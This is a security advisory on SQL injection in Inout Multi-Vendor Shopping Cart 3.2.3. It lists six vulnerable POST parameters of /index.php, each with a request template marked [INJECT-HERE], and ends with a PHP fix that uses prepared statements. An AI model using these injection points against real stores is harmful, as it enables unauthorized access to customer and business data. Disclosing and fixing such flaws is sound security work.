Inout Multi-Vendor Shopping Cart version 3.2.3 suffers from a remote SQL injection vulnerability.

[ Vulnerability ]

Author    : CraCkEr
Website   : inoutscripts.com
Vendor    : Inout Scripts - Nesote Technologies Private Limited
Software  : Inout Multi-Vendor Shopping Cart 3.2.3
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:

SQL injection attacks can allow unauthorized access to sensitive data and
modification of data, and can crash the application or make it unavailable,
leading to lost revenue and damage to a company's reputation.

Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2023

Path: /index.php

POST parameter 'val' is vulnerable to SQLI
val=All[INJECT-HERE]&category=9%20&startpage=0&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=

POST parameter 'category' is vulnerable to SQLI
val=All&category=9%20[INJECT-HERE]&startpage=0&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=

POST parameter 'startpage' is vulnerable to SQLI
val=All&category=9 &startpage=0[INJECT-HERE]&real_price_min=250&real_price_max=34222&vendorid=0&size=&color=

POST parameter 'real_price_min' is vulnerable to SQLI
val=All&category=9 &startpage=0&real_price_min=250[INJECT-HERE]&real_price_max=34222&vendorid=0&size=&color=

POST parameter 'real_price_max' is vulnerable to SQLI
val=All&category=9 &startpage=0&real_price_min=250&real_price_max=34222[INJECT-HERE]&vendorid=0&size=&color=

POST parameter 'vendorid' is vulnerable to SQLI
val=All&category=9 &startpage=0&real_price_min=250&real_price_max=34222&vendorid=0[INJECT-HERE]&size=&color=

[-] Done
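
A defensive sketch for the six parameters listed above, added here as an example and not taken from the vendor's code or the original advisory: each numeric field is validated as an integer and every value reaches the query through a prepared statement. The products table, its columns, both function names, and the reading of 'val' as a name filter and 'startpage' as a page index are assumptions; the demo rows are constructed.

```php
<?php
declare(strict_types=1);
// Hypothetical names throughout: the products table, its columns and both functions.
function parse_filters(array $post): array {
    $out = [];
    // Numeric fields: accept 1-9 digits only and reject everything else.
    foreach (['category', 'startpage', 'real_price_min', 'real_price_max', 'vendorid'] as $key) {
        $raw = trim((string)($post[$key] ?? ''));   // the sample request sends "9 " for category
        if (preg_match('/\A\d{1,9}\z/', $raw) !== 1) {
            throw new InvalidArgumentException("invalid value for $key");
        }
        $out[$key] = (int)$raw;
    }
    // 'val' is assumed to be a free-text name filter: cap its length; it is bound as data below.
    $out['val'] = substr((string)($post['val'] ?? 'All'), 0, 64);
    return $out;
}

function search_products(PDO $db, array $post, int $pageSize = 20): array {
    $f = parse_filters($post);
    // Request values appear only as bound placeholders, never inside the SQL text.
    $stmt = $db->prepare(
        "SELECT id, name, price FROM products
          WHERE category_id = :category AND price BETWEEN :pmin AND :pmax
            AND (:anyvendor = 0 OR vendor_id = :vendor)
            AND (:val = 'All' OR name LIKE :pattern ESCAPE '!')
          ORDER BY id LIMIT :lim OFFSET :off"
    );
    $pattern = '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $f['val']) . '%';
    $bind = [':category' => $f['category'], ':pmin' => $f['real_price_min'],
             ':pmax' => $f['real_price_max'], ':anyvendor' => $f['vendorid'],
             ':vendor' => $f['vendorid'], ':lim' => $pageSize,
             ':off' => $f['startpage'] * $pageSize, ':val' => $f['val'], ':pattern' => $pattern];
    foreach ($bind as $name => $value) {
        $stmt->bindValue($name, $value, is_int($value) ? PDO::PARAM_INT : PDO::PARAM_STR);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo: in-memory SQLite (needs pdo_sqlite) with made-up rows.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name, price, category_id, vendor_id)');
$db->exec("INSERT INTO products VALUES (1,'Lamp',300,9,4), (2,'Desk',900,9,7), (3,'Sofa',500,2,4)");
$ok = ['val' => 'All', 'category' => '9 ', 'startpage' => '0', 'real_price_min' => '250',
       'real_price_max' => '34222', 'vendorid' => '0'];
echo count(search_products($db, $ok)), " rows\n";
try { search_products($db, ['startpage' => "0'"] + $ok); }   // non-numeric value is refused
catch (InvalidArgumentException $e) { echo 'rejected: ', $e->getMessage(), "\n"; }
```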